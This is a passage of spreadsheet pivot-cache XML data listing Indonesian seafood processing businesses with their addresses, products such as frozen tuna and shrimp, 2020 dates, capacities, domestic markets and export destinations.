    <s v="Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="United States, Viet Nam"/>
  </r>
  <r>
    <n v="20790"/>
    <x v="20"/>
    <s v="PT. KELOLA MINA SAMUDRA"/>
    <s v="Komplek PPN Ternate, Jl. Pasar Inpres Bastiong No.97, Kel. Bastiong Talangame, Kec. Ternate Selatan, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-29T00:00:00"/>
    <n v="960000"/>
    <s v="Kota Surabaya"/>
    <s v="United States, Viet Nam"/>
  </r>
  <r>
    <n v="19411"/>
    <x v="197"/>
    <s v="MARIJO 88"/>
    <s v="Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bone, Kota Makassar, Kota Palopo, Kota Kendari"/>
    <s v="Malaysia, Saudi Arabia"/>
  </r>
  <r>
    <n v="19265"/>
    <x v="198"/>
    <s v="CV. NOGO SEGORO"/>
    <s v="Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Bandeng, Patin, Nila)"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="13000"/>
    <m/>
    <s v="China, Japan, Viet Nam"/>
  </r>
  <r>
    <n v="19266"/>
    <x v="198"/>
    <s v="CV. NOGO SEGORO"/>
    <s v="Jl. Kidemang Singomenggolo Kav 4, Kel. Sidomulyo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-17T00:00:00"/>
    <n v="42000"/>
    <m/>
    <s v="China, Japan, Viet Nam"/>
  </r>
  <r>
    <n v="19454"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Gindara, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="France, Germany, Spain"/>
  </r>
  <r>
    <n v="20052"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Lencam, Senangin, Manyung, Kuniran, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="5506"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Poland, United States"/>
  </r>
  <r>
    <n v="19300"/>
    <x v="199"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Campuran Seafood Pasteurisasi Dingin"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="45000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="19453"/>
    <x v="166"/>
    <s v="PT, TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl, Muara Baru Ujung Blok K No,3, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Germany, Italy, Spain"/>
  </r>
  <r>
    <n v="20328"/>
    <x v="174"/>
    <s v="PT, MISAJA MITRA"/>
    <s v="Jl, Raya Pati - Tayu Km 18, Kel, Waturoyo, Kec, Margoyoso, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="1009620.51"/>
    <m/>
    <s v="C√¥te d'Ivoire, Japan"/>
  </r>
  <r>
    <n v="20463"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="150"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, United States"/>
  </r>
  <r>
    <n v="21368"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Barramundi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="155500"/>
    <s v="Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, United States"/>
  </r>
  <r>
    <n v="19397"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19398"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19399"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19400"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19401"/>
    <x v="202"/>
    <s v="PT. MINA USAHA HARAPAN"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Layang, Cakalang)"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19621"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19236"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar, Kota Bitung"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19237"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar, Kota Bitung"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19238"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Steak Tuna Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar, Kota Bitung"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21057"/>
    <x v="204"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Jl. Ancol III No. 1-2, Kel. Ancol Barat, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1720000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19622"/>
    <x v="90"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20951"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Lencam, Kuwe, Janahan, Kerapu, Layur, Sukang, Malabar, Kakatua, Kakap, Kuro, Ekor Kuning, Barramundi)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="21237"/>
    <x v="205"/>
    <s v="PT, INDO AMERICAN SEAFOODS"/>
    <s v="Jl, Ir, Sutami Km 13, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="1463386.5"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21238"/>
    <x v="205"/>
    <s v="PT, INDO AMERICAN SEAFOODS"/>
    <s v="Jl, Ir, Sutami Km 13, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="1463386.5"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20023"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No.59, Kel. Perajen, Kec. Banyuasin I, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Rajungan Beku"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka"/>
    <s v="Australia, Singapore"/>
  </r>
  <r>
    <n v="20026"/>
    <x v="126"/>
    <s v="PT. KIRANA FOOD INTERNATIONAL"/>
    <s v="Jl. Raya Pakah Ponco, Desa Sumberagung, Kec. Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Gresik"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19603"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Fillet Tuna Segar"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19605"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19613"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Steak Tuna Segar"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="17136"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Segar (Kuwe, Kembung, Tenggiri, Selar Kuning)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="175000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19609"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19610"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19611"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kerapu)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19612"/>
    <x v="203"/>
    <s v="PT. ANPING SEAFOOD INDONESIA"/>
    <s v="Jl. Efraim Lengkong, Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="19708"/>
    <x v="206"/>
    <s v="PT. LANGKAT LAUT TIMUR"/>
    <s v="Jl. Pangkalan Brandan No.143, Kel. Beras Basah, Kec. Pangkalan Susu, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Hong Kong, Singapore"/>
  </r>
  <r>
    <n v="19710"/>
    <x v="206"/>
    <s v="PT. LANGKAT LAUT TIMUR"/>
    <s v="Jl. Pangkalan Brandan No.143, Kel. Beras Basah, Kec. Pangkalan Susu, Kabupaten Langkat&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Hong Kong, Singapore"/>
  </r>
  <r>
    <n v="19851"/>
    <x v="115"/>
    <s v="PT. WINAROS KAWULA BAHARI"/>
    <s v="Jl. Raya Cangkringmalang Km 39,4, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20049"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="17800"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="20051"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Lemadang, Marlin, Meka, Layaran, Tenggiri, Barakuda, Opah, Gindara, Cakalang)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="121"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="20053"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Gulama, Lencam, Senangin, Manyung, Kuniran, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="201"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="20055"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="1820"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="20056"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="230"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="20173"/>
    <x v="207"/>
    <s v="CV. ARWANA MANDIRI"/>
    <s v="Jl. Peternakan II Mangga Ubi No.24B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-05-04T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Sri Lanka"/>
  </r>
  <r>
    <n v="20187"/>
    <x v="208"/>
    <s v="PT. PEDULI LAUT MALUKU"/>
    <s v="Jl. Raya Tulehu, Dusun Mamokeng, Desa Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Utuh Beku"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20336"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Capelin Kering Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20351"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, Singapore"/>
  </r>
  <r>
    <n v="20390"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="India, United States"/>
  </r>
  <r>
    <n v="20635"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, United States"/>
  </r>
  <r>
    <n v="20736"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Gulama, Biji Nangka, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Jenggot, Kaca Piring, Kakap, Baronang, Kurisi, Cunang, Barramundi)"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="China, France, Italy"/>
  </r>
  <r>
    <n v="20916"/>
    <x v="209"/>
    <s v="PT. NUTRINDO FRESFOOD INTERNASIONAL"/>
    <s v="Lingkungan I, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="698000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="20952"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="United Arab Emirates"/>
  </r>
  <r>
    <n v="21058"/>
    <x v="204"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Jl. Ancol III No. 1-2, Kel. Ancol Barat, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="310000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21059"/>
    <x v="204"/>
    <s v="PT. WIRONTONO BARU"/>
    <s v="Jl. Ancol III No. 1-2, Kel. Ancol Barat, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21372"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Bawal, Barramundi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, United States"/>
  </r>
  <r>
    <n v="21095"/>
    <x v="210"/>
    <s v="UD. SAMUDERA SUKSES"/>
    <s v="Jl. Metal Komplek Ruko Metal Minimalis No.9, Kel. Tanjung Mulia, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Layur, Kembung, Kuring, Salem, Selar, Aso-aso, Layang)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Palembang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20904"/>
    <x v="211"/>
    <s v="SURATMAN "/>
    <s v="Jl. Beringin Indah Timur RT 001 RW 024, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Anggoli, Kerapu, Bawal, Kapas-kapas, Kakap, Kaci-kaci, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="3000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20905"/>
    <x v="211"/>
    <s v="SURATMAN "/>
    <s v="Jl. Beringin Indah Timur RT 001 RW 024, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20917"/>
    <x v="212"/>
    <s v="HERMAN"/>
    <s v="Kp Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri, Selayar)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20918"/>
    <x v="212"/>
    <s v="HERMAN"/>
    <s v="Kp Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Anggoli, Kerapu, Bawal, Kapas-kapas, Kakap, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
